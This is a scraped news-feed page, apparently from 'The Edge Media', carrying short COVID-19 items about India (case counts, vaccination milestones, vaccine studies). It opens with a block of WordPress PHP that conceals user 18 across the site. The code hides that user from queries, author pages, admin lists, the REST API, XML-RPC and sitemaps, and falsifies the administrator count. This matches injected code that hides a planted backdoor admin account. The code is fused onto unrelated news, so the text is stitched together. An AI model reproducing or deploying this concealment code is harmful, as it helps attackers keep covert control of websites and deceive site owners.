add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Last 24 hrs. – India reports 2,64,202 new cases, 5753 of Omicron. appeared first on The Edge Media.
]]>The post Last 24 hrs. – India reports 2,64,202 new cases, 5753 of Omicron. appeared first on The Edge Media.
]]>The post Biggest Daily Rise (47,092) In Covid Cases In 2 Months Amid Kerala Surge appeared first on The Edge Media.
]]>Kerala contributed 32,803 cases or nearly 70 per cent of new cases and a third of deaths. The total number of those affected in the state by the viral infection now stands at 40,90,036. The test positivity rate was reported at 18.76 and with 173 deaths, the number of fatalities increased to 20,961, a state government release said
With over 85 per cent Covid patients in the southern state isolated at home, the Health Ministry has stressed on a “smart and strategic lockdown” to curb the daily surge, sources told NDTV. Kerala has not been following the Centre’s advice while reporting the highest daily cases in the country, officials insisted, adding that neighbouring states are feeling the impact.
The post Biggest Daily Rise (47,092) In Covid Cases In 2 Months Amid Kerala Surge appeared first on The Edge Media.
]]>The post Brazilian Viper Venom May Become Tool In Fight Against Coronavirus: Study appeared first on The Edge Media.
]]>A study published in the scientific journal Molecules this month found that the molecule produced by the jararacussu pit viper inhibited the virus’s ability to multiply in monkey cells by 75%.
“We were able to show this component of snake venom was able to inhibit a very important protein from the virus,” said Rafael Guido, a University of Sao Paulo professor and an author of the study.
The post Brazilian Viper Venom May Become Tool In Fight Against Coronavirus: Study appeared first on The Edge Media.
]]>The post 1.21 Crore Doses And Counting: India’s Single-Day Vaccination Milestone appeared first on The Edge Media.
]]>Today’s figures on the Co-WIN website showed 1,21,99,230 doses have been administered so far in the day.
India had achieved the one-crore doses milestone for the first time on August 27 this year.
A total of over 65 crore doses of COVID-19 vaccines have been administered so far across the country, the health ministry said Tuesday
Of the total 65,18,58,322 doses administered so far, 50,25,16,979 were first doses while 14,93,41,343 were second doses.
6Comments In the 60+ age group, 13.36 crore people have been vaccinated while 19.80 crore have been vaccinated in the 45-60 age group. In the 18-44 age group, 31.67 crore have been vaccinated so far.
The post 1.21 Crore Doses And Counting: India’s Single-Day Vaccination Milestone appeared first on The Edge Media.
]]>The post New Zealand Reports First Death Linked To Pfizer COVID-19 Vaccine appeared first on The Edge Media.
]]>The information was released by the health ministry following a review by an independent COVID-19 vaccine safety monitoring board of the death of a woman after receiving the vaccine. The ministry’s statement did not give the woman’s age.
The board considered that the woman’s death was due to myocarditis, which is known to be a rare side effect of the Pfizer COVID-19 vaccine, the statement said. Myocarditis is an inflammation of the heart muscle that can limit the organ’s ability to pump blood and can cause changes in heartbeat rhythms.
The post New Zealand Reports First Death Linked To Pfizer COVID-19 Vaccine appeared first on The Edge Media.
]]>The post 3 Hospital Directors Nominated For Padma Awards By Delhi: Arvind Kejriwal appeared first on The Edge Media.
]]>Dr SK Sarin from Institute of Liver and Biliary Sciences (ILBS), Dr Suresh Kumar from Lok Nayak Jai Prakash Narayan Hospital (LNJP), and Dr Sandeep Budhiraja from Max have been named.
The state government had received 9,427 suggestions, out of those 740 were for doctors and the rest for paramedical staff.
The names were picked by a three-member committee chaired by Deputy Chief Minister Manish Sisodia.
The post 3 Hospital Directors Nominated For Padma Awards By Delhi: Arvind Kejriwal appeared first on The Edge Media.
]]>The post Pfizer Jab Side Effects In 12-15 Year Olds Mild To Moderate: Study appeared first on The Edge Media.
]]>The findings of the study were published in the journal ”Archives of Disease in Childhood”.
Although the study numbers are small, the data are representative of those teens most likely to benefit from the vaccination, and should offer reassurance to parents and clinicians, said the authors.
Healthy children with COVID-19 infection generally have a mild illness, but some coexisting conditions, particularly neurological conditions, are associated with severe disease.
The post Pfizer Jab Side Effects In 12-15 Year Olds Mild To Moderate: Study appeared first on The Edge Media.
]]>The post 50% Adults In India Have Got At Least One Vaccine Dose appeared first on The Edge Media.
]]>Health Minister Mansukh Mandaviya said that it was an “unprecedented milestone” as he shared the information on Twitter on Tuesday
“This implies that a significant number of people in India have protection against the virus,” Mr Mandaviya said in another tweet that was put on his official Twitter account.
The cumulative number of vaccination coverage crossed 61 crore landmark milestone on Thursday, with nearly 80 lakh vaccine doses (79,48,439) being administered in the last 24 hours.
The post 50% Adults In India Have Got At Least One Vaccine Dose appeared first on The Edge Media.
]]>The post No Covid Cases Among Yesterday’s Afghanistan Evacuees: Central Force ITBP appeared first on The Edge Media.
]]>“There are no COVID-19 positive cases out of 78 persons (Who came from Afghanistan last night) who are presently under institutional quarantine at ITBP Quarantine Facility at Chhawla Camp, New Delhi,” tweeted the ITBP
India has stepped up efforts to evacuate its citizens as well as Afghan citizens fleeing their country because of the worsening security situation after the Taliban’s stunning sweep to power last week.
A total of 626 people, including 228 Indian citizens, have been evacuated from Afghanistan till now, informed Minister Hardeep Puri. He also informed that 77 among them were Afghan Sikhs. The number of Indian citizens evacuated does not include those working in the Indian Embassy, Mr Puri added.
I
The post No Covid Cases Among Yesterday’s Afghanistan Evacuees: Central Force ITBP appeared first on The Edge Media.
]]>The post ‘India May Be Entering Endemic Stage Of Covid’: WHO Chief Scientist appeared first on The Edge Media.
]]>The endemic stage is when a population learns to live with a virus. It’s very different from the epidemic stage when the virus overwhelms a population.
On clearance to Covaxin, she said she is fairly confident that the WHO’s technical group will be satisfied to give Covaxin clearance to be one of its authorised vaccines and that could happen by mid-SeptemberWe may be entering some kind of stage of endemicity where there is low level transmission or moderate level transmission going on but we are not seeing the kinds of exponential growth and peaks that we saw a few months ago,” Ms Swaminathan said.
The post ‘India May Be Entering Endemic Stage Of Covid’: WHO Chief Scientist appeared first on The Edge Media.
]]>